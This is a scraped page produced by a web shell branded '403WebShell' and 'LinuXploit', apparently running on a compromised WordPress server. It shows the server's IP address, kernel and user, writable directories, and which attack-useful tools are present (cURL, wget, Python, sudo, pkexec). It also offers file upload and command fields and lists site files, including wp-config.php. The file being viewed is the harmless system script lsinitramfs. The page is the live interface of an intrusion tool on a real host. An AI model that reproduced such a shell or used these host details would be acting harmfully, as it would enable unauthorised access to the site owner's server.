buyer kontol nego ga ngotak comecondo.com
 Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
 Apache/2.4.18 (Ubuntu)
 68.183.124.220
 Cant read /etc/named.conf
Name Type Size Owner/Group Permission Last Modified Actions
. dir - gavin/www-data drwxr-sr-x 2024-12-15 11:41:30
.. dir - root/root drwxr-xr-x 2019-08-25 02:29:45
.sucuriquarantine dir - root/www-data drwxr-sr-x 2024-05-24 05:31:33
home dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
worksheets dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
wp-admin dir - gavin/www-data drwxr-sr-x 2025-08-29 03:10:31
wp-content dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
wp-includes dir - gavin/www-data drwxr-sr-x 2021-06-27 11:01:30
.htaccess text/plain 201 B root/www-data -rw-r--r-- 2021-06-24 04:05:20
agent-contact-1.JPG image/jpeg 22.78 KB gavin/www-data -rw-rw-r-- 2022-01-31 05:13:10
circle-16.png image/png 268 B gavin/www-data -rw-rw-r-- 2021-01-11 04:23:00
index.html text/html 11.06 KB gavin/www-data -rw-r--r-- 2019-08-25 02:29:47
index.php text/x-php 420 B gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
license.txt text/plain 19.47 KB gavin/www-data -rw-r--r-- 2019-01-01 08:37:49
map.php text/html 1012 B gavin/www-data -rw-rw-r-- 2021-01-01 03:50:38
pin-8-16.png image/png 309 B gavin/www-data -rw-rw-r-- 2021-01-11 04:38:33
pin-8-24.png image/png 499 B gavin/www-data -rw-rw-r-- 2021-01-11 04:40:01
pin-blue-1.png image/png 28.16 KB gavin/www-data -rw-rw-r-- 2022-01-27 09:10:36
pin-green-1.png image/png 12.71 KB gavin/www-data -rw-rw-r-- 2022-01-27 09:23:52
pin-house-red-2.png image/png 1.36 KB gavin/www-data -rw-rw-r-- 2022-01-30 09:18:10
pin-house-red-3.png image/png 2.49 KB gavin/www-data -rw-rw-r-- 2022-01-30 09:20:50
readme.html text/html 7.27 KB gavin/www-data -rw-r--r-- 2019-04-08 10:59:56
wallpaper1.jpg image/jpeg 58.99 KB gavin/www-data -rw-rw-r-- 2022-01-29 05:15:06
wallpaper2.jpg image/jpeg 788.8 KB gavin/www-data -rw-rw-r-- 2022-02-01 11:27:14
wp-activate.php text/x-php 6.76 KB gavin/www-data -rw-r--r-- 2019-01-12 06:41:52
wp-blog-header.php text/x-php 369 B gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-comments-post.php text/x-php 2.23 KB gavin/www-data -rw-r--r-- 2019-01-21 01:34:51
wp-config-sample.php text/x-php 2.83 KB gavin/www-data -rw-r--r-- 2020-10-24 04:07:41
wp-config.php text/x-php 3.62 KB gavin/www-data -rw-r--r-- 2022-04-20 01:23:49
wp-cron.php text/x-php 3.76 KB gavin/www-data -rw-r--r-- 2019-01-09 08:37:51
wp-links-opml.php text/x-php 2.44 KB gavin/www-data -rw-r--r-- 2019-01-16 05:29:49
wp-load.php text/x-php 3.23 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-login.php text/x-php 38.62 KB gavin/www-data -rw-r--r-- 2019-06-10 01:34:45
wp-mail.php text/x-php 8.21 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-settings.php text/x-php 18.52 KB gavin/www-data -rw-r--r-- 2019-03-28 07:04:51
wp-signup.php text/x-php 30.36 KB gavin/www-data -rw-r--r-- 2019-01-16 04:51:52
wp-trackback.php text/x-php 4.65 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
xmlrpc.php text/x-php 3 KB gavin/www-data -rw-r--r-- 2018-08-17 01:51:36
© BlackDragon
403WebShell
403Webshell
Server IP : 68.183.124.220  /  Your IP : 216.73.216.228
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : gavin ( 1000)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/bin/lsinitramfs
#!/bin/sh

set -eu

usage()
{
	echo "Usage: $(basename $0) [-l] <initramfs file>"
}

if [ "$#" -eq 0 ] ; then
	usage >&2
	exit 1
fi

cpio_args="--extract --quiet --list"

OPTIONS=`getopt -o hl --long help,long -n "$0" -- "$@"`
# Check for non-GNU getopt
if [ $? != 0 ] ; then echo "W: non-GNU getopt" >&2 ; exit 1 ; fi

eval set -- "$OPTIONS"

while true; do
        case "$1" in
        -h|--help)
		usage
		exit 0
	;;
	-l|--long)
		cpio_args="${cpio_args:+${cpio_args} --verbose}"
		shift
	;;
	--)
		shift
		break
	;;
	*)
		echo "Internal error!" >&2
		exit 1
	esac
done

listarchive()
{
	archive="$1"
	if zcat -t "${archive}" >/dev/null 2>&1 ; then
		zcat "${archive}" | cpio ${cpio_args}
	elif xzcat -t "${archive}" >/dev/null 2>&1 ; then
		xzcat "${archive}" | cpio ${cpio_args}
	elif bzip2 -t "${archive}" >/dev/null 2>&1 ; then
		bzip2 -c -d "${archive}" | cpio ${cpio_args}
	elif lzop -t "${archive}" >/dev/null 2>&1 ; then
		lzop -c -d "${archive}" | cpio ${cpio_args}
	fi
}

# Read bytes out of a file, checking that they are valid hex digits
readhex()
{
	dd < "$1" bs=1 skip="$2" count="$3" 2> /dev/null | \
		LANG=C grep -E "^[0-9A-Fa-f]{$3}\$"
}

# Check for a zero byte in a file
checkzero()
{
	dd < "$1" bs=1 skip="$2" count=1 2> /dev/null | \
		LANG=C grep -q -z '^$'
}

for initramfs in "$@" ; do
	if ! [ -r "${initramfs}" ] ; then
		echo "Specified file could not be read." >&2
		exit 1
	else
		echo "${initramfs}"

		# There may be a prepended uncompressed archive.  cpio
		# won't tell us the true size of this so we have to
		# parse the headers and padding ourselves.  This is
		# very roughly based on linux/lib/earlycpio.c
		offset=0
		while true; do
			if checkzero "$initramfs" $offset; then
				offset=$((offset + 4))
				continue
			fi
			magic="$(readhex "$initramfs" $offset 6)" || break
			test $magic = 070701 || test $magic = 070702 || break
			namesize=0x$(readhex "$initramfs" $((offset + 94)) 8)
			filesize=0x$(readhex "$initramfs" $((offset + 54)) 8)
			offset=$(((offset + 110)))
			offset=$(((offset + $namesize + 3) & ~3))
			offset=$(((offset + $filesize + 3) & ~3))
		done

		if [ $offset -ne 0 ]; then
			# List uncompressed archive
			cpio ${cpio_args} < "$initramfs"

			# List main archive
			subarchive=$(mktemp ${TMPDIR:-/var/tmp}/lsinitramfs_XXXXXX)
			trap "rm -f $subarchive" EXIT
			dd < "$initramfs" bs="$offset" skip=1 2> /dev/null \
				> $subarchive
			listarchive $subarchive
		else
			listarchive "${initramfs}"
		fi

	fi
done

Youez - 2016 - github.com/yon3zu
LinuXploit